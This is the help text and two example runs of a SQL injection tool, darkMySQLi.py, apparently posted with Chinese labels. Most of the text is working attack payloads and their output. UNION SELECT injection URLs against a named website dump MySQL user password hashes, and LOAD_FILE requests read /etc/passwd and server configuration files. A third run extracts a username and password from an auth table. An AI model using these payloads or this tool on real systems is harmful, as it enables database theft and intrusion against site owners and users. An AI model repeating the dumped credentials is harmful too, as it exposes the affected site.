darkMySQLi v.1.0 rsauron@gmail.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start, --stop) MySQL v4+
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
实例:
darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --info
|--------------------------------------------------|
| rsauron@gmail.com v1.0 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10
[+] 14:06:17
[+] Evasion: /**/ --
[+] Cookie: None
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: db2889_rayner_en
User: mysql2889@localhost
Version: 5.0.32-Debian_7etch1-log
[+] Do we have Access to MySQL Database: YES <-- w00t w00t
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+FROM+mysql .user--
[+] Dumping MySQL user info. host:user:password
[+] Number of users in the mysql.user table: 6
[0] localhost:root:N
[1] dlx35341:root:N
[2] localhost:debian-sys-maint:*0EF29B1AED94CC60062FED7F4DF2224A0C880A10
[3] localhost:mysql2908:*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD
[4] localhost:mysql2970:*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83
[5] localhost:mysql2889:*8050739003BBDB60551FA99B5FFF34957C4F5F49
[+] Do we have Access to Load_File: YES <-- w00t w00t
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10--
[+] Magic quotes are: OFF
[+] Starting Load_File Fuzzer...
[+] Number of system files to be fuzzed: 37
[!] Found /et@c/pa@sswd
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10--
[!] Found /et@c/hos@ts
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6,7,8,9,10--
[!] Found /et@c/m@otd
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6,7,8,9,10--
[!] Found /et@c/apach@e2/apache2.conf
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f617061636865322e 636f6e66),3,4,5,6,7,8,9,10--
[!] Found /et@c/apa@che2/httpd.conf
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f68747470642e636f 6e66),3,4,5,6,7,8,9,10--
[!] Found /et@c/ap@ache2/sites-available/default
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f73697465732d6176 61696c61626c652f64656661756c74),3,4,5,6,7,8,9,10--
[!] Found /et@c/m@ysql/my.cnf
[!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d7973716c2f6d792e636e66),3,4,5, 6,7,8,9,10--
[-] 14:06:43
[-] Total URL Requests: 48
[-] Done
info dump with where clause option and debug turned on
darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --dump -D db2889_rayner_en -T auth -C name,pass --where pass,ridley --debug
|--------------------------------------------------|
| rsauron@gmail.com v1.0 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10
[+] 14:17:43
[+] Evasion: /**/ --
[+] Cookie: None
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x6461726b63306465,0x1e,version(),0x1e,user (),0x1e,database(),0x1e,0x6461726b63306465),3,4,5,6,7,8,9,10--
Database: db2889_rayner_en
User: mysql2889@localhost
Version: 5.0.32-Debian_7etch1-log
[+] Dumping data from database "db2889_rayner_en" Table "auth"
[+] and Column(s) ['name', 'pass']
[+] WHERE clause: WHERE+pass=0x7269646c6579
[+] ORDERBY clause:
[debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,COUNT(*),0x1e,0x20),3,4,5,6,7,8,9 ,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579--
[+] Number of Rows: 1
[debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,name,0x1e,pass,0x1e,0x1e,0x20),3, 4,5,6,7,8,9,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579/**//**/LIMIT/**/0,1--
[1] rayneriol:ridley:
[-] 14:17:45
[-] Total URL Requests: 3
[-] Done
具体用户请看提示帮助